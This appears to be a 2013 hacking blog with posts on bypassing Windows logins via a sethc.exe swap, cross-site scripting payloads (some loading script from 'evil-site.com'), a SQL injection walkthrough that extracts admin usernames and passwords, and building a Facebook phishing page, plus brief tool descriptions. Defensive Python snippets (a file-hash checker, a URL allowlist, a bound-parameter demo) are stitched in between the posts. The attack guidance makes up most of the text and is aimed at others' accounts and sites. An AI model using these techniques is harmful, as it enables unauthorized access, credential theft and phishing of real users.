Wednesday, October 23, 2013.

How to hack a Windows password



To hack a Windows password you need a live CD. For Windows XP, doing it through BackTrack is easier, but if you have Windows 7 installed, continue with the following procedure.

1. Use any Linux live CD, such as Ubuntu.

2. Boot from the CD.

3. Go to the C drive > Windows > System32 folder.

4. Copy cmd.exe and paste it onto another drive, such as D.

5. Rename that copy of cmd.exe to sethc.exe.

6. Go to the C drive > Windows > System32 folder again.

7. Copy sethc.exe and paste it onto another drive, such as E (not D).

8. Copy the new sethc.exe that you made earlier from the D drive and paste it into C:/windows/system32. It will ask whether to overwrite the file; click Yes.

9. Shut down and remove the live CD.

10. On your PC, when the login screen appears, press the Shift key 5 times and you will get a command prompt.

11. Type "net user"; it will list all users.

12. Type "net user administrator password" without quotes, where "password" can be any password you like and administrator is the user account name. To change the password for another user, just replace administrator with that user name. For example, if my user name is cyberkey and I want to set the new password to 123456789, I have to type "net user cyberkey 123456789" without quotes.

13. Restart your PC and log in with the new password, in my case "123456789".

14. Copy the sethc.exe that we backed up on the E drive and paste it into the C drive > Windows > System32 folder. Windows will ask whether to overwrite the file; click Yes.

Note: if you have only one drive, you can back up the two files, cmd.exe and sethc.exe, to your pen drive.
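While step 8 is in effect, the sethc.exe in System32 is byte-for-byte a copy of cmd.exe, which is something a defender can check for. The following is an added example, not part of the original post: it hashes the Sticky Keys binary and reports when its contents match the command interpreter in the same folder. The function names and the default path are assumptions for illustration.

```python
import hashlib
import os
import sys

# File names taken from the procedure above; callers can extend both lists.
LOGON_HELPERS = ("sethc.exe",)
SHELLS = ("cmd.exe",)


def sha256_file(path, chunk=1 << 20):
    """Return the SHA-256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def find_swapped_helpers(system32, helpers=LOGON_HELPERS, shells=SHELLS):
    """Return [(helper, shell)] pairs whose file contents are identical.

    Works on a live system or on an offline volume mounted read-only.
    Names are matched case-insensitively, because a Windows volume mounted
    under Linux keeps whatever case each file was created with.
    """
    present = {name.lower(): os.path.join(system32, name)
               for name in os.listdir(system32)}
    shell_hashes = {}
    for shell in shells:
        path = present.get(shell.lower())
        if path and os.path.isfile(path):
            shell_hashes[sha256_file(path)] = shell
    findings = []
    for helper in helpers:
        path = present.get(helper.lower())
        if path is None or not os.path.isfile(path):
            continue  # helper missing: nothing to compare
        match = shell_hashes.get(sha256_file(path))
        if match:
            findings.append((helper, match))
    return findings


if __name__ == "__main__":
    # Default path is an assumption; pass the mounted System32 folder instead.
    target = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32"
    for helper, shell in find_swapped_helpers(target):
        print(f"ALERT: {helper} is identical to {shell}")
```

Once step 14 restores the original file the hashes differ again, so a scheduled run or a file-integrity monitor on System32 is what catches the window in between.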

Sunday, October 13, 2013.

Cross Site Scripting (XSS)



Simply put, cross site scripting involves the injection of malicious code into a website. It is the most common method of attack at the moment, as most large sites will contain at least one XSS vulnerability. However, there is more than one type of XSS. The most commonly found is referred to as "non persistent" XSS. 

Non Persistent XSS

Non persistent as the title suggests means that the injected script isn't permanent and just appears for the short time the user is viewing the page. The best example of this is a basic coded search engine for a site. Say for example, the site search script is in this format:

Site.com/search.php?search=text here



Once something has been searched for, the script may display on the page something along the lines of:

"Results for text here"

That is, it simply echoes your search string straight onto the page without performing any validation checks. What if we were to alter the search string to contain HTML or JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font>


Site.com/search.php?search=<script>alert("XSS");</script>


If no sanitization checks are being performed by the search script, this will just be echoed straight onto the page, therefore displaying an alert or red text. If there was no limit to the size, this could be used to display anything you want.

However, since the attacker can only display code on their own pages, this isn't much of a threat to other users, although if the string was turned into hex, the search string may be slightly more hidden and, with a little deception, could be used to trick users into thinking the link is legitimate.

Next there's persistent XSS


Persistent XSS



Again, as the name suggests, this is the type of XSS attack the attacker would want to get. Persistent attacks are injected permanently into the code of the site, so anyone who views the site will see them. In order for these to work, the code has to be made to store itself on the site's server somehow, and a place where that happens can be hard to find.

An embarrassing example of this was an XSS vulnerability discovered on this site by one of our users (fixed now, obviously) affecting the page all.php. The register process wasn't sanitized at all, so all a user had to do was simply register with a username containing HTML or JavaScript code. This was an obvious vulnerability which should have been spotted from the beginning, but just like XSS on other sites it was missed. If not fixed, this vulnerability would affect all.php as well as the forums and anywhere else the username was displayed on the site. A good place to look out for this vulnerability is basic forum scripts that site owners have made themselves or found on sites designed to help novices.

With both of these attacks, it is also possible to run malicious code from another site, again making the possibilities of attack endless. JavaScript has a lot of features that are not well known, such as changing the images on sites through images[number].src, and anyone who uses MySpace will know that CSS can be used to remove or replace certain sections of a site based on name. If you have a permanently vulnerable site, injecting code as simple as the one below will allow you to run XSS off another site:

<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>


Getting Past Basic Protection 



So what if a site owner knows about XSS, but has provided some but very little protection against it? Well, this is where CharCode comes in. Char code is basically just a simple form of character encoding that can encode blocked characters so they get past the protection but still get displayed normally on the page. Here is a very common one that will pop up alerts saying "XSS" if it is vulnerable: 

';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>


This is a very useful XSS to know, as it provides more than one type of attack at once. If you get only one or two alerts, you know that only one or two of them work, so you need to try to eliminate some of them to test which one is affecting the site. The CharCode for "X" is 88 and "S" is 83. As you can see, each provides a slight variation to try to beat character blocking.

XSS could also be hidden in a non-existent image. The code below would run malicious JavaScript disguised as an image:

<img src="javascript:alert('XSS');">


What if quotes are blocked? No problem, just inject the site like so: 

<img src=javascript:alert(&quot;XSS&quot;)>


The &quot; will be interpreted in HTML as a " so the code will run fine. The next one below is very likely to work if you find a site is vulnerable.

<img src=javascript:alert(String.fromCharCode(88,83,83))>


The XSS is hidden in image form and CharCode is being used to display the XSS vulnerability.

Now things get slightly more complicated as we enter ASCII and Unicode. Unicode is just a basic code that was invented to allow all characters to be available to everyone, e.g. for different languages such as Chinese character symbols, and ASCII has a similar purpose. You can go to http://www.asciitable.com to view the HTML code needed for ASCII code. The example below shows the whole code in ASCII form:

<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


As you can tell, this will beat many filters as the code is basically unrecognisable. However, translating the code can display what it was designed to do. Next for Unicode, again this makes the text unrecognisable but works the same:

<img src=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


If the site has a limited amount of characters allowed, this probably won't be useful. As mentioned previously, hex can also be used for XSS. The example below shows this:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


Again unrecognisable which makes it a great XSS to use. 
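Output encoding for the reflected search example and an allowlist check for the encoded javascript: variants above, shown as an added example that is not part of the original post. It contrasts a literal-string blacklist with decoding the value first and then allowing only http and https; the function names and sample values are constructed for illustration.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https"}  # assumption: user links/images need only these


def render_results(query):
    """Reflect the search term as text: & < > " ' are emitted as entities."""
    return "<p>Results for " + html.escape(query, quote=True) + "</p>"


def naive_filter(value):
    """Weak check: a blacklist that looks for the literal strings only."""
    lowered = value.lower()
    return "<script" not in lowered and "javascript:" not in lowered


def canonical_url(raw):
    """Decode an attribute value the way an HTML parser would before use.

    html.unescape applies the HTML5 rules, so decimal, zero-padded and hex
    character references decode with or without the trailing ';'. Control
    characters and whitespace are then removed, because browsers drop tabs
    and newlines inside a URL.
    """
    return re.sub(r"[\x00-\x20]+", "", html.unescape(raw))


def is_safe_url(raw):
    """Allowlist check on the decoded value, not a blacklist on the raw one."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", canonical_url(raw))
    if match is None:
        return True  # no scheme: a relative URL on the same site
    return match.group(1).lower() in ALLOWED_SCHEMES


# Constructed attribute values using the encodings shown above.
SAMPLES = {
    "plain": "javascript:alert('XSS');",
    "decimal": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "padded": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
              "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
    "hex": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "newline": "jav&#x0A;ascript:alert('XSS');",
    "vbscript": 'vbscript:msgbox("XSS")',
    "relative": "images/logo.png",
    "https": "https://example.com/logo.png",
}


def audit(samples=SAMPLES):
    """Map each sample to (passes naive blacklist, passes allowlist)."""
    return {name: (naive_filter(v), is_safe_url(v)) for name, v in samples.items()}


if __name__ == "__main__":
    print(render_results('<script>alert("XSS");</script>'))
    for name, (naive_ok, strict_ok) in audit().items():
        print(f"{name:9} blacklist={naive_ok!s:5} allowlist={strict_ok}")
```

Every encoded sample passes the blacklist and fails the allowlist, while ordinary relative and https URLs pass both.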

The list of possible XSS attacks is endless and is far more than is covered here. With so many ways to bypass security checks, site owners have to work harder to try to protect their sites. With web forms on most sites these days allowing users to enter code that will be stored somewhere and inevitably viewed by someone else, XSS can be used for almost anything. With practice, XSS can be used to run a hidden cookie stealer which a user will view, allowing you to steal their login info or, if sessions are used, to perform "session hijacking", where you steal their session data and again log in as them; or it can be used for the simple defacement of a website through HTML or JavaScript. XSS is definitely an attack method which should be studied well, as it is such a common method of attack.

As mentioned above, the list of possible XSS attacks is endless and there isn't enough room to mention them all here, but I will finish with some more XSS examples that may affect a vulnerable site.

<IMG SRC="jav&#x0A;ascript:alert('XSS');"> - new line vulnerability 

<iframe src=http://evil-site.com/evil.html < - XSS using an iframe to display a whole new page

<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT> - again beat checks using Javascript



<BODY BACKGROUND="javascript:alert('XSS')"> - infected body tag

<BGSOUND SRC="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - stylesheet vulnerability

<IMG SRC='vbscript:msgbox("XSS")'> - vbscript, scripting language similar to javascript, again can help beat validation checks

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - incorrectly parsed meta refresh

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> - base64 encoding, another form of encoding (not encryption); this one is less likely to work.

<SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT> - very sneaky method, here you rename your .js to .jpg, but since you have the script tags it will still be read as a js file. 




The list goes on and on; the best way is to just try them yourself. A lot of the time, incorrectly written HTML code will be the best method. If one way doesn't work, try adding an extra ">" or "<" to the start or end of the code, for example, or view the source of the page for code tags you need to close, adding a "'>" to the end and then starting your own malicious code. Well, that's the end of this tutorial. For more XSS attack examples just use Google, as more of these are being thought up every day. Soon you should even be able to invent your own.






Saturday, October 5, 2013.

How to hack Website using SQL Injection


What is SQL Injection?
SQL Injection is one of the most common web application vulnerabilities. It allows an attacker to inject malicious SQL commands through a parameter or any input box that is connected to the website's database. In SQL Injection an attacker finds a SQL injection (SQLi) vulnerability, injects malicious code through various techniques and hacks the website's database. This is called a SQL Injection attack, exploiting the DB (database), or SQL Injection vulnerability exploitation. Using the SQL Injection attack method an attacker can get the complete DB of the website: user IDs and passwords can be exposed, and an attacker can also shut down the MySQL server. An attacker can also modify the content of the website and bypass login.


SQL Injection Dorks.
Vulnerable website. (Use Google to find a vulnerable website.)
Firefox with the HackBar add-on.
A little bit of understanding of SQL Injection and URLs.
A fresh mind to understand it.

1. Find a vulnerable website.

An attacker always uses the Google, Bing or Yahoo search engine to search for SQL Injection vulnerable websites using dorks, that is, dorks with a parameter URL.

Search for any one dork on Google. For example, I'm using inurl:index.php?id=

Basically I always use Google to search for vulnerable websites, and if you want to hack a particular website, then you have to scan it or manually check every page and URL to identify whether it is vulnerable or not.

Here, for the tutorial, I already have one vulnerable website (but I can't expose its name). In this result you will find thousands of websites. The common thing in this search result is that every website URL has this type of code at its end: inurl:index.php?id=  Yeah, definitely it will, because all these websites have a SQL parameter in their URL. So simply Google search it.



Find SQLi Vulnerabilities
Open any website URL which has a SQL parameter, like the dorks.
Put a single quote (') at the end of the website URL.
For Eg.: www.targetwebsite.com/index.php?id=2'
If the page remains the same or shows Not Found, then it's not vulnerable; if the page shows any type of error related to a SQL string or a MySQL error, then the website is vulnerable to SQLi. For example, I got this error:

An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1


This means the website is vulnerable to SQL Injection. *Cheers*

✔ Find the number of Columns.


Yehfii!! We found a SQL Injection vulnerable website; now it's time to find the number of columns present in the database.
To do that, replace that single quote ( ' ) with an "Order By no." statement and repeat until you find the error message. Change the no. from 1,2,3,4,5,6,7,8,9,... until you get an error message like "Unknown Column".
For example, change its Order By 1,2,3,4 like the example below:
www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3


If the above method doesn't work, use the method below.
www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--

If you get an error on Order by 9, that means the DB has 8 columns, and if you find an error on Order by 6, then the DB has 5 columns. I mean, if you put Order by 12 and the DB has only 11 columns, then the website will show an error like this: An error occurred  Unknown column '12' in 'order clause'.

# This trick is used to find the number of columns in the DB. Study the example below and you will get to know it.


www.targetwebsite.com/index.php?id=8 Order by 1  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6    (Error)
.........................Try Until you get an Error..........................

Here, my vulnerable website showed an error on Order by 12, which means my vulnerable website has 11 columns in its DB. So now I have found the number of columns in my DB: Number of Columns = 11


✔ Find the Vulnerable Column.
Basically, if the website is vulnerable then it has the vulnerability in one of its columns, and now it's time to find out which column. We have successfully discovered the number of columns present in the database, so let us find the vulnerable column by using the query "Union Select columns_sequence". Also change the ID value to negative: suppose the website has the URL index.php?id=8, change it to index.php?id=-8. Just put a minus sign "-" before the ID.
For example, if the number of columns is 11, then the query is as follows:

www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--

If the above method doesn't work, use the method below:

www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--

Once the query has been executed, it will display the number of the column.


In the above result, I found three vulnerable columns: 2, 3 & 4. Let's take 2 for our tutorial. Well! We found the vulnerable columns, now the next step.

✔ Finding version, Database and User.
Now we have to find out the website's database version, user, database name and some other information. Just replace the vulnerable column no. with "version()".

For example:
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--


Now hit Enter and you will get the result.

Now do the same again: replace the vulnerable column with a different query, like database() or user().

For example:
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4,5,6,7,8,9,10,11--


If the above method doesn't work, use the method below:


www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--


✔ Finding the Table name.
We have found the vulnerable column, the DB version and the user; now it's time to get the table name. If the database version is 4 or above then you have to guess the table names (Blind SQL Injection attack).
Let us now find the table names of the database. As before, replace the vulnerable column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".

For example:
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


Now hit Enter and you can see the complete table list of the database.

Great, we found the table names; now find the table name that is related to admin or user. As you can see in the above image, there is one table name: userDatabase. Let us choose that table, userdatabase, and go on to the next step.

✔ Finding the Column name.
Now do the same to find the column names: replace "group_concat(table_name)" with "group_concat(column_name)" and replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".

Do not hit Enter yet. First of all, convert the table name into a MySQL CHAR() string.
Install the HackBar add-on in Firefox.
After installing it you can see the toolbar; if you can't, hit F9. Select sql->Mysql->MysqlChar() in the HackBar.

Enter the table name you want to convert into MySQL CHAR.

Now you can see the CHAR like this:

Copy and paste the code at the end of the URL in place of "mysqlchar":
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--


Now hit Enter and you will be able to see the column names like this:







Great, here we found the Username and Password columns :D.

✔ Explore Database & Hack it.
Cool! Now you know what to do in the next step :D. Get the ID and password of the admin user by using this command in the URL. Replace group_concat(column_name) with group_concat(username,0x2a,password), or with any other column name you want to get data from.

For example:
http://targetwebsite.com/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--


If the above command doesn't work, then use the column names from the beginning, put in all the columns at one time, and you will be able to get the complete database.
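The quote, ORDER BY and UNION probes in the steps above only work when the id parameter is concatenated into the SQL text and the database error is shown to the visitor. This added example (not from the original post) runs those probes against a concatenated query and against a validated, bound-parameter query. It uses Python's sqlite3 in place of MySQL, and the table, data and function names are constructed.

```python
import re
import sqlite3


def make_db():
    """In-memory SQLite stand-in for the site's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO pages VALUES (8, 'About', 'About this site')")
    return db


def get_page_concat(db, raw_id):
    """The pattern the steps above depend on: the parameter becomes SQL text."""
    sql = "SELECT id, title, body FROM pages WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def get_page_bound(db, raw_id):
    """Hardened form: validate the type, then pass the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # not a page id, so no query is built from it
    return db.execute(
        "SELECT id, title, body FROM pages WHERE id = ?", (int(raw_id),)
    ).fetchall()


def handle(db, fetch, raw_id):
    """Return (status, body) without ever echoing the database error text."""
    try:
        rows = fetch(db, raw_id)
    except sqlite3.Error:
        # Log the exception server-side; the client sees a generic message.
        return 500, "An error occurred"
    if not rows:
        return 404, "Not found"
    return 200, rows[0][1]


# Probe strings of the shapes used in the steps above (3 columns here, not 11).
PROBES = ["8", "8'", "8 order by 3", "8 order by 4", "-8 union select 1,2,3--"]


def compare(db):
    """Return (probe, status with concatenation, status with binding)."""
    return [(p, handle(db, get_page_concat, p)[0], handle(db, get_page_bound, p)[0])
            for p in PROBES]


if __name__ == "__main__":
    for probe, concat_status, bound_status in compare(make_db()):
        print(f"{probe!r:28} concat={concat_status} bound={bound_status}")
```

With binding, every probe other than a plain numeric id gets the same 404, so the response no longer distinguishes a valid column count from an invalid one, and the UNION row never reaches the page.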




Sunday, September 15, 2013.

Facebook Phishing

Hack Facebook using a phishing page




STEP 1: Creating the phishing.php file:
1.1 Simply copy the following script and save it as phishing.php





STEP 2: Creating the index.html page:

2.1 Open the Facebook login page, then right click > View page source, paste it into Notepad and save it as index.html.
2.2 Open that index.html file with Notepad, search (by pressing Ctrl+F) for "action" in it, and replace the highlighted part (as in the following screenshot) with phishing.php.




STEP 3: Now create a completely blank text file with the name password.txt.
Now you have all of the following three files with you:
1. phishing.php
2. index.html
3. password.txt



If you do not have your own web hosting account Upload file on 




Wednesday, September 11, 2013.

Nmap

I think everyone has heard of this one. Nmap (Network Mapper) is a free, open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters / firewalls are in use, and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a "map" of the network. Nmap runs on most types of computers, and both console and graphical versions are available. It can be used by beginners (-sT) and by pros (--packet-trace) alike. A very versatile tool, once you fully understand the results.


The Mole v0.3 Released For Download – Automatic SQL Injection Exploitation Tool


The Mole is an automatic SQL Injection exploitation tool. All you need to do is provide a vulnerable URL and a valid string on the site you are testing and the Mole will detect the injection and exploit it, either by using the union technique or a boolean query based technique.

We did mention the Mole when we first heard about it back in 2011 - The Mole - Automatic SQL Injection SQLi Exploitation Tool.


Nessus

Recently went closed source, but is still essentially free. Works with a client-server framework. Nessus is the world's most popular vulnerability scanner, used in over 75,000 organizations worldwide. Many of the world's largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.